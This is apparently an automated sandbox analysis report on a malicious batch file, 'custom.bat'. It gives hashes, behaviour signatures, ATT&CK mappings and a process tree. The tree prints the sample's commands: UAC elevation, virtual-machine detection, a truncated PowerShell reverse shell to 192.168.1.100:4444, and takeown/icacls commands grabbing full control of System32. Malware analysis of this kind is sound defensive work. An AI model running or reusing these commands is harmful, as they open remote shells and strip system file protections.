1b8c1fc80ad13c703485ddb7f6581584e5b538862287266b960f4994549214a3 | Triage

Analysis

max time kernel
150s
max time network
103s
platform
windows10-1703_x64
resource
win10-20240611-en
resource tags

arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system
submitted
08-09-2024 06:41

Sharing

Report Analysis Logs

General

Target

custom.bat
Size

2KB
MD5

6482067516f0f24cdc0a596de66c951a
SHA1

9a77d1d6bc48250c98e57af675dec3a2dac51ed8
SHA256

1b8c1fc80ad13c703485ddb7f6581584e5b538862287266b960f4994549214a3
SHA512

25fa1d45b9a10e97cded264824bae7e2d149850d2e0a618b448f434aedee160b7f014dca765aadd501d064e952effe5393d0163dd0cfe1bd8c03de593c037e86

Score

8^/10

discovery execution exploit

Malware Config

Signatures

Possible privilege escalation attempt 2 IoCs

pid	Process
3700	icacls.exe
1344	takeown.exe

Modifies file permissions 1 TTPs 2 IoCs

File and Directory Permissions Modification

pid	Process
1344	takeown.exe
3700	icacls.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Start PowerShell.

PowerShell

pid	Process
2412	powershell.exe
780	powershell.exe

Gathers system information 1 TTPs 3 IoCs

Runs systeminfo.exe.

System Information Discovery

pid	Process
4400	systeminfo.exe
4856	systeminfo.exe
4560	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2412	powershell.exe
2412	powershell.exe
2412	powershell.exe
780	powershell.exe
780	powershell.exe
780	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2412	powershell.exe
Token: SeDebugPrivilege	780	powershell.exe
Token: SeTakeOwnershipPrivilege	1344	takeown.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 1468 wrote to memory of 2572	1468	cmd.exe	71
PID 1468 wrote to memory of 2572	1468	cmd.exe	71
PID 2572 wrote to memory of 2412	2572	cmd.exe	73
PID 2572 wrote to memory of 2412	2572	cmd.exe	73
PID 2412 wrote to memory of 3552	2412	powershell.exe	74
PID 2412 wrote to memory of 3552	2412	powershell.exe	74
PID 2572 wrote to memory of 4400	2572	cmd.exe	76
PID 2572 wrote to memory of 4400	2572	cmd.exe	76
PID 2572 wrote to memory of 1508	2572	cmd.exe	77
PID 2572 wrote to memory of 1508	2572	cmd.exe	77
PID 2572 wrote to memory of 4856	2572	cmd.exe	80
PID 2572 wrote to memory of 4856	2572	cmd.exe	80
PID 2572 wrote to memory of 304	2572	cmd.exe	81
PID 2572 wrote to memory of 304	2572	cmd.exe	81
PID 2572 wrote to memory of 4560	2572	cmd.exe	82
PID 2572 wrote to memory of 4560	2572	cmd.exe	82
PID 2572 wrote to memory of 3132	2572	cmd.exe	83
PID 2572 wrote to memory of 3132	2572	cmd.exe	83
PID 2572 wrote to memory of 780	2572	cmd.exe	84
PID 2572 wrote to memory of 780	2572	cmd.exe	84
PID 2572 wrote to memory of 1344	2572	cmd.exe	85
PID 2572 wrote to memory of 1344	2572	cmd.exe	85
PID 2572 wrote to memory of 3700	2572	cmd.exe	86
PID 2572 wrote to memory of 3700	2572	cmd.exe	86

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\custom.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1468
- C:\Windows\system32\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\custom.bat /min
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2572
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Start-Process cmd -Verb runAs"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2412
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      PID:3552
- - C:\Windows\system32\systeminfo.exe
    systeminfo
    3⤵
    - Gathers system information
    PID:4400
- - C:\Windows\system32\findstr.exe
    findstr /i "VirtualBox"
    3⤵
    PID:1508
- - C:\Windows\system32\systeminfo.exe
    systeminfo
    3⤵
    - Gathers system information
    PID:4856
- - C:\Windows\system32\findstr.exe
    findstr /i "VMware"
    3⤵
    PID:304
- - C:\Windows\system32\systeminfo.exe
    systeminfo
    3⤵
    - Gathers system information
    PID:4560
- - C:\Windows\system32\findstr.exe
    findstr /i "Hyper-V"
    3⤵
    PID:3132
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:780
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\* /r /d y
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1344
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\* /grant Admin:F /t /c
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3700

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

PowerShell

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
5d574dc518025fad52b7886c1bff0e13

SHA1
68217a5f9e9a64ca8fed9eefa4171786a8f9f8f7

SHA256
755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2

SHA512
21de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
60129d82ff521c73496df69284cea0ca

SHA1
206d0791a8702980f2734cbc73bf2d1544c41b8d

SHA256
7f8a6d6452367a6f250b1b8c940353978024fa6b04923d6b63d4cf3b305f1626

SHA512
60bdb7bf4310292054daf4de32028f3da2fd022468225db55ec50721af07005ba2bab639f8fe9100937f822b370500b66c2e97129c555b910f397517109e9e8c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ejykxbio.dgr.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
memory/2412-4-0x00007FFF8BF33000-0x00007FFF8BF34000-memory.dmp

Filesize
4KB

Download
memory/2412-5-0x0000022771A50000-0x0000022771A72000-memory.dmp

Filesize
136KB

Download
memory/2412-7-0x00007FFF8BF30000-0x00007FFF8C91C000-memory.dmp

Filesize
9.9MB

Download
memory/2412-9-0x0000022771EC0000-0x0000022771F36000-memory.dmp

Filesize
472KB

Download
memory/2412-22-0x00007FFF8BF30000-0x00007FFF8C91C000-memory.dmp

Filesize
9.9MB

Download
memory/2412-32-0x00007FFF8BF30000-0x00007FFF8C91C000-memory.dmp

Filesize
9.9MB

Download